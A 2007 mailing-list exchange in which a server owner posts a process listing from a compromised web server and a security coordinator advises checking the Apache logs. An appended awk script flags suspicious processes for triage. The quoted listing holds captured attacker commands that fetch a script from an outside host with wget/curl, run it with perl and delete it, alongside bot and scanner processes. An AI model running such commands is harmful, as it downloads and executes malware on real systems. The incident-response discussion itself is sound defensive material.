[ubuntu-uk] off topic - server security

Tony Arnold tony.arnold at manchester.ac.uk
Thu Dec 27 08:22:53 GMT 2007


Sean,

I'd have a look at the Apache logs and see what URLs are being accessed
and go from there. Their location might give you a clue.

Do you have any PHP stuff on there such as phpBB or similar?

Regards,
Tony.

Sean Miller wrote:
> Here's a "ps -fe" I did a little while ago, just before I rebooted...
> 
> As you can see, they're really working hard to frustrate me...
> 
> Sean
> 
> [root at s15247463 httpdocs]# ps -fe | grep apache
> apache    2889  2220  1 Dec26 ?        00:18:36 /usr/sbin/httpd
> apache    2891  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
> apache    2892  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache    2893  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache    2894  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
> apache    2895  2220  0 Dec26 ?        00:00:05 /usr/sbin/httpd
> apache    2896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   14664  2220  0 Dec26 ?        00:00:03 /usr/sbin/httpd
> apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
> apache   32719     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
> apache   19751  2894  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   19764     1 23 Dec26 ?        03:31:35 shellbot      
> apache   28642  2220  0 Dec26 ?        00:00:04 /usr/sbin/httpd
> apache   28662  2891  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   28666     1 22 Dec26 ?        03:23:10 shellbot      
> apache   29532  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
> apache   29933  2220  0 Dec26 ?        00:07:18 /usr/sbin/httpd
> apache   20833  2893  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20838     1 13 Dec26 ?        01:21:35 [httpds]   
> apache   20847 29532  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20853     1 13 Dec26 ?        01:21:33 [httpds]   
> apache   20870  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   20879  2892  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20884     1 13 Dec26 ?        01:21:28 [httpds]   
> apache   20887  2896  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20892     1 13 Dec26 ?        01:21:16 [httpds]   
> apache   20895  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
> apache   20896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   20901  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   21445  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
> apache    1875     1  0 00:01 ?        00:00:00 [httpds]   
> apache    2237     1  0 00:14 ?        00:00:00 ./mocks start
> apache    5465 20895  0 00:23 ?        00:00:00 [sh] <defunct>
> apache    5477     1  6 00:23 ?        00:24:48 shellbot      
> apache   10110 14664  0 01:00 ?        00:00:00 [sh] <defunct>
> apache   10142     1 11 01:00 ?        00:44:09 shellbot      
> apache   10537  2220  0 01:27 ?        00:00:01 /usr/sbin/httpd
> apache   13780     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13781 13780  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt;rm -rf test* 2>&1
> 3>&1
> apache   13784     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13785 13784  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt;rm -rf test* 2>&1
> 3>&1
> apache   13788     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13789 13788  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt ;rm -rf test*
> 2>&1 3>&1
> apache   13792     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13793 13792  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt;rm -rf test* 2>&1
> 3>&1
> apache   13798 13789  0 02:29 ?        00:00:00 perl test.txt
> apache   13802 13781  0 02:29 ?        00:00:00 perl test.txt
> apache   13806 13793  0 02:29 ?        00:00:00 perl test.txt
> apache   13810 13785  0 02:29 ?        00:00:00 perl test.txt
> apache   22282  2220  0 03:40 ?        00:00:00 /usr/sbin/httpd
> apache   22434 20896  0 03:51 ?        00:00:00 [sh] <defunct>
> apache   22442     1 10 03:51 ?        00:20:33 [httpd]
> apache   22513 21445  0 03:55 ?        00:00:00 [perl] <defunct>
> apache   22515     1  0 03:55 ?        00:00:00
> /usr/local/apache/bin/nscan -DSSL
> apache   22552  2220  0 03:58 ?        00:00:00 /usr/sbin/httpd
> apache   23183     1  0 04:03 ?        00:00:48
> /usr/local/apache/bin/nscan -DSSL
> apache   23187     1  0 04:03 ?        00:00:47
> /usr/local/apache/bin/nscan -DSSL
> apache    3606  2220  0 04:52 ?        00:00:00 /usr/sbin/httpd
> apache   27716     1  0 06:54 ?        00:00:00 [httpd]
> apache   27720     1  0 06:54 ?        00:00:00 ./php
> apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
> apache   28299 28140  0 07:12 ?        00:00:00 /bin/bash ./a 139.1
> apache   28302 28299  9 07:12 ?        00:00:20 /bin/bash  139.1 22
> 

-- 
Tony Arnold, IT Security Coordinator, University of Manchester,
IT Services Division, Kilburn Building, Oxford Road, Manchester M13 9PL.
T: +44 (0)161 275 6093, F: +44 (0)870 136 1004, M: +44 (0)773 330 0039
E: tony.arnold at manchester.ac.uk, H: http://www.man.ac.uk/Tony.Arnold
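
Alongside the log review suggested above, the quoted `ps -fe` listing can be triaged mechanically. The following is an added example, not part of the original message: it flags processes owned by the web server account that are not ordinary workers of the master httpd, assuming PID 2220 (the parent of the `/usr/sbin/httpd` workers in the listing) is the legitimate master; the function names are illustrative and the sample lines are an excerpt of the listing above.

```shell
#!/bin/sh
# Flag processes owned by the web server user that are not plain workers
# of the expected master httpd. Reads `ps -fe` output on stdin.
# Usage: ps -fe | flag_odd_web_procs <user> <master-pid> <expected-binary>
flag_odd_web_procs() {
    awk -v user="$1" -v master="$2" -v bin="$3" '
        $1 != user { next }          # skips the header and other accounts
        {
            # ps -fe columns: UID PID PPID C STIME TTY TIME CMD...
            cmd = $8
            for (i = 9; i <= NF; i++) cmd = cmd " " $i

            reason = ""
            # A worker should be running the packaged binary...
            if ($8 != bin) reason = "unexpected-command"
            # ...and should be a direct child of the master process.
            if ($3 != master)
                reason = (reason == "" ? "" : reason ",") "parent-not-master"

            if (reason != "")
                printf "%s\tpid=%s ppid=%s\t%s\n", reason, $2, $3, cmd
        }'
}

# Excerpt of the listing quoted in the message above (unwrapped).
sample_ps() {
    cat <<'EOF'
apache    2891  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
apache   28662  2891  0 Dec26 ?        00:00:00 [sh] <defunct>
apache   28666     1 22 Dec26 ?        03:23:10 shellbot
apache   20838     1 13 Dec26 ?        01:21:35 [httpds]
apache   13798 13789  0 02:29 ?        00:00:00 perl test.txt
apache   22442     1 10 03:51 ?        00:20:33 [httpd]
apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
EOF
}

# Run against the excerpt; on a live host pipe in `ps -fe` instead.
sample_ps | flag_odd_web_procs apache 2220 /usr/sbin/httpd
```

The command column is whatever the process chose to call itself, so a match on the name alone proves nothing; on a live host, compare against the target of `/proc/<pid>/exe` as well. The defunct `sh` entries are worth keeping in the output because their PPID identifies which httpd worker spawned a shell.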


